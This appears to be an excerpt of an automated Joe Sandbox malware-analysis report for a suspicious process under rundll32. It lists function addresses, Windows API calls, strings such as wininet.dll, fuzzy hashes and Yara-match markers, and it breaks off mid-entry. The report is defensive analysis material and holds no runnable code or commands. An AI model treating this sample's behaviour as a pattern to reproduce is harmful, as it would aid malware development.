APIs

LdrInitializeThunk.NTDLL ref: 04FB96DA

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 302e91297ccb4e600ed199e681d53e004c0eb711b88aad389f5d4d9efd7bc75c
Instruction ID: 93d7800000364ef00a29c2d089775f9545409a79f1fe05f4cf663f406d09ca5a
Opcode Fuzzy Hash: 302e91297ccb4e600ed199e681d53e004c0eb711b88aad389f5d4d9efd7bc75c
Instruction Fuzzy Hash: A590027124100942F200A1594504B4A000597E0345F51C02AA0116694D8655D8527561

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB966A

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b951866c01e91d4e42716ddf7da466d8ba12b1786e2b240dfe04d9d96111c422
Instruction ID: a0a3d6bc2d1e63a62514ba5adacf62cbf5a91eacc7fa38b79d88123328ac59a8
Opcode Fuzzy Hash: b951866c01e91d4e42716ddf7da466d8ba12b1786e2b240dfe04d9d96111c422
Instruction Fuzzy Hash: 8490027124100902F280B159450464E000597D1345F91C029A0017694DCA55DA5A77E1

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB965A

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a70f1364871283ae4c03c5b7a63d58c713d2ad682f53fb55d7ca5ea43dae0cc
Instruction ID: 217574df340c7243ba6d22aed4d858ada9f49b720d47bb3ae7c87cb597b8f8b8
Opcode Fuzzy Hash: 5a70f1364871283ae4c03c5b7a63d58c713d2ad682f53fb55d7ca5ea43dae0cc
Instruction Fuzzy Hash: 8290027124504942F240B1594504A4A001597D0349F51C025A00566D4D9665DD56B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB9FEA

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad654e817a77ccbd2c1ce5a82d2c715c9e10209bab89ec5508eb439cc206ea6a
Instruction ID: c76850f7ce1b36a8f588758a5d8d533345bd7ee0442508a5f42be2add0bf20ca
Opcode Fuzzy Hash: ad654e817a77ccbd2c1ce5a82d2c715c9e10209bab89ec5508eb439cc206ea6a
Instruction Fuzzy Hash: EE90027135114502F210A159850470A000597D1245F51C425A0816598D86D5D8927162

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB978A

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b3afeff714bc6a6e22123543db3570aefd9d0fefe17947d603eed94d4866b678
Instruction ID: 0a29b1e66a2bc410f2ba1b4cc553602dc959d4dcf3c6439db8bcc1167021c965
Opcode Fuzzy Hash: b3afeff714bc6a6e22123543db3570aefd9d0fefe17947d603eed94d4866b678
Instruction Fuzzy Hash: 4190026925300102F280B159550860E000597D1246F91D429A0007598CC955D86A6361

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB971A

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e48cb8c2b22965c275ad0cb5baeaa79164936a9595e86142c414e364f2cea5d
Instruction ID: 67efc09b2554511dad138c089ccbddb58b8313dd3ced58942d1bd46e68afae25
Opcode Fuzzy Hash: 6e48cb8c2b22965c275ad0cb5baeaa79164936a9595e86142c414e364f2cea5d
Instruction Fuzzy Hash: F890027124100502F200A599550864A000597E0345F51D025A5016595EC6A5D8927171

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB986A

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aada7cf46b6d82feddfcaa15b198103e9b007c1cb588b4551aa92389f6465e20
Instruction ID: d08518483c2eb8747636e1888634167954d761e4c9fdd0e7b14d0df1cd5b486a
Opcode Fuzzy Hash: aada7cf46b6d82feddfcaa15b198103e9b007c1cb588b4551aa92389f6465e20
Instruction Fuzzy Hash: 4990027124100513F211A159460470B000997D0285F91C426A0416598D9696D953B161

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB984A

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac889eec5e0c3e64b9db1fb1f9acb4afbe567b1162db5cca61772b4720fe3d16
Instruction ID: 6e8f7e247dbbb0c08866ca1148fa2cc64256eceb0791153eafcec8bebf2918a7
Opcode Fuzzy Hash: ac889eec5e0c3e64b9db1fb1f9acb4afbe567b1162db5cca61772b4720fe3d16
Instruction Fuzzy Hash: 7D900261282042527645F159450450B4006A7E0285791C026A1406990C8566E857E661

Uniqueness

Uniqueness Score: -1.00%

Function 04FB99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB99AA

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 093c05e649265173b7ce0aeece63e2cf0815fd277e9379786f5111f3950975e9
Instruction ID: 17f8a252e87f9e59a3a25c6a6c631ea4e69a116380215434d591de405f982691
Opcode Fuzzy Hash: 093c05e649265173b7ce0aeece63e2cf0815fd277e9379786f5111f3950975e9
Instruction Fuzzy Hash: CB9002A138100542F200A1594514B0A0005D7E1345F51C029E1056594D8659DC537166

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB991A

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 876e28818b7243a1670c72534345dc1d42873ce9e5211a9ddf39ec254f67cbc4
Instruction ID: 155364f331ca55f9b6e963e9c659f71ee5f7e6322c9d974536162bf60a886db9
Opcode Fuzzy Hash: 876e28818b7243a1670c72534345dc1d42873ce9e5211a9ddf39ec254f67cbc4
Instruction Fuzzy Hash: 2E9002B124100502F240B159450474A000597D0345F51C025A5056594E8699DDD676A5

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB9A5A

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e08568553a9de3fc2c9f9a59825a993ec1a2df2ab76b950fcd99b0e7386c6e4f
Instruction ID: e919234edfb96af90334b53092eeeaa7ef39dd24fca314851451ac4be5dce0a7
Opcode Fuzzy Hash: e08568553a9de3fc2c9f9a59825a993ec1a2df2ab76b950fcd99b0e7386c6e4f
Instruction Fuzzy Hash: F990026125180142F300A5694D14B0B000597D0347F51C129A0146594CC955D8626561

Uniqueness

Uniqueness Score: -1.00%

Function 01059080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 01059128

Strings

net.dll, xrefs: 010590F1, 01059177, 0105914F, 0105915B, 01059183
wininet.dll, xrefs: 010590DE, 010590E7

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: cf11a7c98f92f63d48e629b1ad43b573df90eb2fd10163441a916f2ce7fef1f5
Instruction ID: f76e78640863afa28326ac8048cd9b93034c3b4f2f87e8d1a26cae5becb678d2
Opcode Fuzzy Hash: cf11a7c98f92f63d48e629b1ad43b573df90eb2fd10163441a916f2ce7fef1f5
Instruction Fuzzy Hash: 5331B2B2500345BBC754DF68C884FABB7F8FB48B04F00801DFA6A5B245D630B650CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 01059077 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 01059128

Strings

net.dll, xrefs: 010590F1, 0105914F, 0105915B
wininet.dll, xrefs: 010590DE, 010590E7

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: bf1c60a700571126fabc756c53cbefe261c7ffd7c8646e77637556f683262feb
Instruction ID: db3b3dd08afd63f081e9e124ec869c6d8e7895caa491784f75853606cdab4c04
Opcode Fuzzy Hash: bf1c60a700571126fabc756c53cbefe261c7ffd7c8646e77637556f683262feb
Instruction Fuzzy Hash: 0B21C1B1900345ABDB64DF68C8C5BABBBB4EB48704F10805DEA6A6B245D770A550CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0105A663 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01043AF8), ref: 0105A69D

Strings

.z`, xrefs: 0105A68C, 0105A698

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: b2204e2f3154a21616b52370856c95365492cd319cd28ced6c3a0ad4860cd6f9
Instruction ID: 54cd983bdb7fd23452165fe781ef628a212a5d675ac13b6fe5c9400e7ea9ba1e
Opcode Fuzzy Hash: b2204e2f3154a21616b52370856c95365492cd319cd28ced6c3a0ad4860cd6f9
Instruction Fuzzy Hash: 05E0D8B82442894BD714EF69DC9049B37C5EF802047109A5AEC5987756C230D91A46F0

Uniqueness

Uniqueness Score: -1.00%

Function 0105A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01043AF8), ref: 0105A69D

Strings

.z`, xrefs: 0105A68C, 0105A698

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: b75ae6189cd6007179b7db8a61bdc63f0002272f8c7ae3f4a2b593dd9b8b195d
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: D7E012B1200208ABDB18EF99CC48EA777ACEF88650F118658BE085B281C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 01048308 Relevance: 3.1, APIs: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0104836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0104838B

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 9db7f71b7da35f0750626960d3d4a35a0452b2ec1b5eadf7cbc293584009142e
Instruction ID: 01e866e34bdb6d9525c02658395ab4d25ff40c0f42dccacb95192a19f518fc3d
Opcode Fuzzy Hash: 9db7f71b7da35f0750626960d3d4a35a0452b2ec1b5eadf7cbc293584009142e
Instruction Fuzzy Hash: 38016671A802297BE321BA949C42FEE3B5C5B40B00F044168FF44BA0C0F6946A0143E1

Uniqueness

Uniqueness Score: -1.00%

Function 01048310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0104836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0104838B

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction ID: f014370a3f558bdc5e8540e566fba63f57ee3aa3926060f76c1e63b512ec24d1
Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction Fuzzy Hash: 58014271A802297BF721BA949C42FFF776C5B50F40F044128FF44BA1C0EAA4790642F6

Uniqueness

Uniqueness Score: -1.00%

Function 010482D8 Relevance: 3.1, APIs: 2, Instructions: 53
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0104836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0104838B

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a3815789c0680e71eb0528094a45829dbe048cc79d05cdb9102869b575241842
Instruction ID: 2c48d7d17a61d0529063b721b8f8eea940e5d7d17c45a14ce67f89eae29b77bb
Opcode Fuzzy Hash: a3815789c0680e71eb0528094a45829dbe048cc79d05cdb9102869b575241842
Instruction Fuzzy Hash: A8014E71B8021A7BF771B5B42C42FEF37885B51A61F0441A6FE88EB1C0F980650542E1

Uniqueness

Uniqueness Score: -1.00%

Function 0104ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0104AD62

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 6c1da7f28a417b76e01b70e8d483c82d2a69030bcadef31b0691d1c400c89b2b
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: F3015EB5E4020EABDF50EBE4DC81FDEB7B89B14208F0045A5ED4997241F630E744CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0105A6DD Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0105A734

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: ae56e2bce012a3892e73756868087f0876225775383b80888b6a878e32e81c52
Instruction ID: f87b678c0f2fb993119f0b83baa73dbb79a6cbe757885d0d8d570d294312ad3c
Opcode Fuzzy Hash: ae56e2bce012a3892e73756868087f0876225775383b80888b6a878e32e81c52
Instruction Fuzzy Hash: 8401AFB6200108ABCB54CF89DD80EEB37A9AF8C754F158248BA0DA7250C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0105A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0105A734

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 79d05f364d937aabd3a3f103206ec632db3640d4661cced845985714084d1710
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 1201B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 010591B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0104F050,?,?,00000000), ref: 010591EC

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: fae906c78181de7630efb0e23d798c80b6ead711412a0b26827c401ed9c2da1b
Instruction ID: 49afc0b7ec7c2ac3479485f62b3f44853c440a6a04a986e46e5c830521360a06
Opcode Fuzzy Hash: fae906c78181de7630efb0e23d798c80b6ead711412a0b26827c401ed9c2da1b
Instruction Fuzzy Hash: 63E092773803143AE370659DAC02FEBB39CCB91B64F14002AFB4DEB2C0D995F80142A8

Uniqueness

Uniqueness Score: -1.00%

Function 010591A3 Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0104F050,?,?,00000000), ref: 010591EC

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: ad02dd8526eb9a70fa81380ace8f1d7069ba958649b69a97f1c4a1744bb4f19b
Instruction ID: fccbb9554b65850c0dbd33648dc57f037527a1727ec4ad869beceb10fb3808b2
Opcode Fuzzy Hash: ad02dd8526eb9a70fa81380ace8f1d7069ba958649b69a97f1c4a1744bb4f19b
Instruction Fuzzy Hash: 23F02B363813407AE37066684C42FE77668DF91B14F18005EFB89EF2C1D995B8044364

Uniqueness

Uniqueness Score: -1.00%

Function 0105A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0104F1D2,0104F1D2,?,00000000,?,?), ref: 0105A800

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 676aac85cf49ed91903688f28e4f6284a4f71399bb8c9efd89dd7ed40550ab24
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 4CE04FB1200208ABDB10DF89CC84EE737ADEF88650F118154FE0C57241C930F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0105A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(01054536,?,01054CAF,01054CAF,?,01054536,?,?,?,?,?,00000000,00000000,?), ref: 0105A65D

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 1a1e41d747fc2d028e43df0986e78364fe3afc17f8916a1e934e61a3694ef704
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 06E046B1200208ABDB14EF99CC40EE777ACEF88654F118558FE085B281C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0104F6C8 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,01048D14,?), ref: 0104F6FB

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e877ac45c71d59c7cb50ca1596343d02e601c3bffe499f6f17bf986782152fd6
Instruction ID: 0b93e1519d4d431ed6a70e87234622f1fc2c5314ebdd6817bc02bcb83228bbf7
Opcode Fuzzy Hash: e877ac45c71d59c7cb50ca1596343d02e601c3bffe499f6f17bf986782152fd6
Instruction Fuzzy Hash: 53E02B7135430A3FEB11EEF89C02FDB2B895B68700F2A0074F98ADB3D3D855E0014520

Uniqueness

Uniqueness Score: -1.00%

Function 0104F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,01048D14,?), ref: 0104F6FB

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 4c2ed8dcf848a139588f3563544732d5d7a50d8d84574151e8e3348094c7e947
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 51D05E716503092BE710AAA89C02FA632C85B54A04F490064FA88D62C3E950E0004165

Uniqueness

Uniqueness Score: -1.00%

Function 04FB967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB9694

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

